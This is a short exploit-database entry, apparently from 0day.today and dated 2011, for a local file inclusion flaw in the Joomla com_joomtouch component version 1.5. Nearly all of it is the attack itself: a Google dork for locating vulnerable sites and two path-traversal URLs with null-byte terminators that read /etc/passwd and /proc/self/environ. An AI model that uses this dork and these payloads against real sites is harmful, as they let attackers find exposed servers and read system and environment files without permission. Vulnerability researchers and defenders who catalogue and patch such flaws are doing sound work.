id: 17577
date: 08/25/2011
title: Joomla com_joomtouch LFI
author: n/a
cves: 

# Exploit Title: Joomla com_joomtouch LFI
# Version: 1.5
# Google d0rk: inurl:com_joomtouch
# Tested on: B.T-5 Windows 7 Windows Xp Sp3 Fr
# Exploit : http:/127.0.0.1/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../etc/passwd%00
            http:/127.0.0.1/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../proc/self/environ%00

#  0day.today [2023-03-24]  #